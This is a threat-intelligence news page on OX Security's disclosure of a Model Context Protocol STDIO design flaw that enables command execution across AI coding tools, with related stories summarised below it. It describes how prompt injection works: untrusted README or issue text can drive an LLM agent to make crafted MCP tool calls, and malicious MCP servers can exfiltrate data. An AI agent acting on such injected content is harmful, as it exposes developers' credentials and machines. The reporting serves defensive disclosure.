Skip to main content
Mallory

Anthropic MCP STDIO Design Flaw Enables RCE Across AI Tooling

ai-platform-securityremote-access-implantbuild-pipeline-compromiseinternet-exposed-serviceleaked-secret-api-key
Updated May 1, 2026 at 02:01 AM4 sources
Share:
Anthropic MCP STDIO Design Flaw Enables RCE Across AI Tooling

Get Ahead of Threats Like This

Know if you're exposed. Before adversaries strike.

Researchers at OX Security disclosed a design-level weakness in Anthropic’s Model Context Protocol (MCP) that can allow arbitrary OS command execution through unsafe STDIO transport behavior, creating a broad AI supply-chain risk. The flaw is reported to propagate through Anthropic’s official MCP SDKs into downstream tools and agents, with researchers linking it to at least 10 high- and critical-severity vulnerabilities across widely used projects. Reported impacts include exposure of sensitive data such as API keys, chat histories, internal databases, and developer workstations, while estimates of exposure range from more than 7,000 publicly accessible servers to as many as 200,000 servers potentially at risk.

Affected or cited projects include LangFlow, Flowise, GPT Researcher, Upsonic, Windsurf, Claude Code, Cursor, Gemini-CLI, GitHub Copilot, LiteLLM, and LettaAI. OX Security said it began reporting the issue to Anthropic in late 2025, but Anthropic reportedly treated the behavior as expected and responded by updating security guidance rather than changing the protocol architecture. Researchers described four main abuse paths: direct command injection, hardening bypass, zero-click or near-zero-click prompt injection in AI IDEs and coding assistants, and malicious MCP marketplace submissions that can execute commands on developer machines; they urged organizations to restrict public exposure, sandbox MCP-enabled services, treat external MCP configurations as untrusted, monitor MCP tool use, and install MCP servers only from verified sources.

Timeline

  1. Apr 20, 2026

    Public disclosure warns MCP flaw threatens AI supply chain

    In April 2026, OX Security publicly disclosed the architectural weakness, warning it could put thousands of publicly accessible MCP servers and software packages with more than 150 million downloads at risk. The disclosure framed the issue as a broader AI supply-chain problem because the insecure behavior propagated through Anthropic's official MCP SDKs into many downstream projects.

  2. Apr 20, 2026

    Vendors issue patches for some affected MCP ecosystem projects

    Several downstream vendors released fixes for vulnerabilities tied to the MCP design weakness in their own products. However, Anthropic itself had not changed the underlying protocol architecture, according to the researchers.

  3. Apr 16, 2026

    Researchers link MCP flaw to 10 vulnerabilities across AI tools

    OX Security connected the protocol design issue to at least 10 high- and critical-severity CVEs or vulnerabilities affecting MCP-based tools and AI agents, including products such as LangFlow, Flowise, Windsurf, Claude Code, Cursor, Gemini-CLI, GitHub Copilot, LiteLLM, and LettaAI-related tooling. The researchers said the weakness created multiple exploit classes, including command injection, hardening bypass, prompt injection, and malicious marketplace package abuse.

  4. Apr 16, 2026

    Anthropic updates guidance but keeps MCP architecture unchanged

    After receiving the reports, Anthropic reportedly treated the STDIO behavior as expected rather than a protocol flaw. Instead of changing the MCP architecture, it updated security guidance to caution developers about use of STDIO adapters.

  5. Nov 1, 2025

    OX Security begins disclosing MCP STDIO design flaw to Anthropic

    OX Security said it first reported a design-level weakness in Anthropic's Model Context Protocol beginning in November 2025. The issue centered on unsafe STDIO transport behavior that could enable arbitrary OS command execution in downstream MCP implementations.

See the full picture in Mallory

Mallory subscribers get deeper analysis on every story, including:

Impact Assessment

Who’s affected and how

Technical Details

Deep-dive technical analysis

Response Recommendations

Actionable next steps for your team

Indicators of Compromise

IPs, domains, hashes, and more

AI Threads

Ask questions and take action on every story

Advanced Filters

Filter by topic, classification, timeframe

Scheduled Alerts

Get matching stories delivered automatically

Related Stories

Prompt-injection chain enables code execution in Anthropic’s Git MCP server

Prompt-injection chain enables code execution in Anthropic’s Git MCP server

Anthropic fixed three vulnerabilities in its official *Git MCP server* (`mcp-server-git`) that could be triggered via **prompt injection** and chained with other MCP tools to achieve **remote code execution** or destructive file operations. The issues were reported by agentic AI security firm **Cyata**, which demonstrated that attacker-controlled content an AI assistant might read (for example, a malicious `README`, poisoned issue text, or other untrusted context) could drive the LLM to invoke MCP tool calls with crafted arguments, enabling exploitation without the attacker having direct access to the victim host. Cyata identified `CVE-2025-68143` (**unrestricted `git_init`**), `CVE-2025-68145` (**path validation bypass**), and `CVE-2025-68144` (**argument injection in `git_diff`**). In combination—particularly when `mcp-server-git` is used alongside the *Filesystem MCP server*—the flaws could enable code execution, arbitrary file deletion/overwrite, and reading arbitrary files into the LLM context (with Cyata noting this does not inherently provide direct exfiltration). The vulnerabilities affected default deployments of `mcp-server-git` prior to **version `2025.12.18`**; Anthropic was notified in June and shipped fixes in December, and there was no indication reported that the bugs were exploited in the wild.

1 months ago
AI Developer Tool Vulnerabilities in Cursor IDE and AWS MCP Components

AI Developer Tool Vulnerabilities in Cursor IDE and AWS MCP Components

Multiple disclosures highlighted **security weaknesses in AI development tooling and Model Context Protocol (MCP) ecosystems**, including a Proofpoint-reported *Cursor IDE* deeplink abuse technique and AWS advisories for flaws in MCP-related components. Proofpoint described **"CursorJack"** as a social-engineering-driven abuse of the `cursor://` protocol handler that, in tested configurations, could let an attacker trigger arbitrary command execution or install a malicious remote MCP server after a user click and prompt acceptance. The report emphasized that developers are high-value targets because their workstations often hold credentials and privileged access, and noted the default UI did not clearly distinguish malicious MCP install deeplinks from legitimate ones. AWS separately disclosed two **distinct vulnerabilities** affecting its AI and MCP tooling rather than the same Cursor issue. **CVE-2026-4270** affects the *AWS API MCP Server* in versions `>= 0.2.14` and `< 1.3.9`, where alternate-path handling could bypass intended file access restrictions and expose arbitrary local file contents in the MCP client context; AWS fixed the issue in version `1.3.9` and credited Varonis Threat Labs. **CVE-2026-4269** affects the *Bedrock AgentCore Starter Toolkit* before `v0.1.13`, where missing S3 ownership verification could allow remote code injection during the build process and lead to code execution in the AgentCore Runtime. The material is **not fluff** because it contains substantive vulnerability disclosures with affected versions, impact, and remediation guidance, but the references do **not** all describe the same specific incident.

1 months ago
Model Context Protocol (MCP) Security Risks From Untrusted Tool Servers and Verifiability Gaps

Model Context Protocol (MCP) Security Risks From Untrusted Tool Servers and Verifiability Gaps

Security researchers warned that the *Model Context Protocol (MCP)*—used to let AI assistants connect to local tools and enterprise SaaS data—creates a significant attack surface when organizations install or authorize MCP “servers” and tool integrations. Praetorian highlighted that **locally hosted MCP servers run with the user’s privileges** and can therefore execute arbitrary commands, access local files, install malware, and exfiltrate data while masquerading as legitimate productivity tooling; it also described **“MCP server chaining,”** where a malicious local MCP server abuses data and actions flowing through a trusted remote integration (e.g., Slack/Google Drive) without needing to compromise the official provider. Separately, Gopher Security emphasized a **trust and auditability gap** in MCP deployments: standard logging for remote tool execution can be incomplete or tampered with, and organizations often cannot prove what code ran or what parameters were used inside a remote “black box” execution environment. The post described “puppet”/interception-style scenarios where an attacker could alter an MCP request (e.g., changing tool-call parameters to trigger data exfiltration or unauthorized actions) while returning plausible “success” responses, and proposed cryptographic approaches (e.g., **zero-knowledge proofs**) to make MCP tool execution verifiable rather than relying on mutable logs.

Today

Get Ahead of Threats Like This

Mallory continuously monitors global threat intelligence and correlates it with your attack surface. Know if you're exposed. Before adversaries strike.